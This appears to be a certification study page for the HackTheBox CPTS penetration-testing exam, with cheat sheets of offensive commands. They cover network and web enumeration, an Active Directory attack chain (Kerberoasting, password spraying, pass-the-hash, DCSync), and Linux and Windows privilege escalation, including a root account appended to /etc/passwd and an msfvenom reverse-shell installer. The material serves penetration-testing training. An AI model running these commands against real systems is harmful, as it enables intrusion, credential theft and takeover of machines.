CPTS
HackTheBox

HTB Certified Penetration Testing Specialist

Advanced Practical 10-day exam + professional report Pass: Passing report $210

Comprehensive practical exam covering the full pentest lifecycle. Requires professional-grade report writing.

Official Page
IssuerHackTheBox
FormatPractical 10-day exam + professional report
Duration10 days
Pass ScorePassing report
Overview Syllabus (8) Tools (7) Cheat Sheets (2) Labs (1)
Cheat Sheets
Enumeration Mastersheet

Network Enumeration Mastersheet

# Initial discovery
nmap -sn 10.10.10.0/24 -oG sweep.txt | grep Up

# Full port TCP
nmap -p- --open -sV -sC --min-rate=1000 -oA tcp target

# Aggressive + scripts
nmap -T4 -A -v target

# Service-specific scripts
nmap --script http-enum,http-title -p 80,443,8080 target
nmap --script smb-vuln* -p 445 target
nmap --script ftp-anon -p 21 target

# UDP top 20
nmap -sU --top-ports 20 -sV target

Web Application Enumeration

# Directory/file discovery
ffuf -u http://target/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -fc 404 -t 100
gobuster dir -u http://target -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,js,txt -o dirs.txt

# vHost discovery
ffuf -u http://target -H "Host: FUZZ.target.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -fc 200 -fs 

# Parameters
ffuf -u http://target/page?FUZZ=value -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
arjun -u http://target/api/endpoint

# API endpoint discovery
ffuf -u http://target/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt

Active Directory Full Attack Chain

# 1. Initial enumeration
bloodhound-python -d domain.htb -u user -p pass -ns dc01_ip -c all --zip

# 2. Kerberoast
GetUserSPNs.py domain.htb/user:pass -dc-ip dc01 -request -outputfile spns.txt
hashcat -m 13100 spns.txt rockyou.txt -r rules/best64.rule

# 3. AS-REP Roast
GetNPUsers.py domain.htb/ -usersfile users.txt -dc-ip dc01 -format hashcat -outputfile asrep.txt

# 4. Password spray
cme smb dc01 -u users.txt -p 'Password123' --continue-on-success

# 5. Pass-the-Hash
cme smb 10.10.10.0/24 -u Administrator -H 'LMHASH:NTHASH' --local-auth
psexec.py domain/Admin@target -hashes :NTHash

# 6. DCSync
secretsdump.py domain/Admin:pass@dc01
secretsdump.py domain/Admin@dc01 -hashes :NTHash

# 7. Pass-the-Ticket
# Get ticket: Rubeus.exe tgtdeleg /target:cifs/server.domain.local /nowrap
# Use: export KRB5CCNAME=ticket.ccache; psexec.py -k -no-pass domain/admin@target
Use BloodHound "Find Shortest Paths to Domain Admins" as your first query after collection — it immediately shows the attack path.
Privilege Escalation Reference

Linux Privilege Escalation Quick Reference

# SUID binaries
find / -perm -u=s -type f 2>/dev/null
# Check against https://gtfobins.github.io/

# sudo -l then GTFOBins
sudo vim -c ':!/bin/bash'
sudo python3 -c 'import os; os.system("/bin/bash")'
sudo find . -exec /bin/bash \; -quit
sudo nmap --interactive; !sh

# Cron abuse
cat /etc/crontab; ls -la /etc/cron.d/ /etc/cron.hourly/
# If script is writable: echo 'chmod +s /bin/bash' >> /path/to/script

# Capabilities
getcap -r / 2>/dev/null
# python3 cap_setuid: python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# Writable /etc/passwd
openssl passwd -1 -salt hacker hacker123
echo 'hacker:$1$hacker$...:0:0:root:/root:/bin/bash' >> /etc/passwd

Windows Privilege Escalation

# Token impersonation (SeImpersonatePrivilege)
whoami /priv
# PrintSpoofer
.\PrintSpoofer.exe -i -c powershell.exe
# GodPotato
.\GodPotato.exe -cmd "cmd /c whoami"

# Unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\\windows"
# Create malicious binary at unquoted path segment

# AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom -p windows/shell_reverse_tcp LHOST=x LPORT=4444 -f msi -o shell.msi
msiexec /quiet /qn /i C:\Users\user\Desktop\shell.msi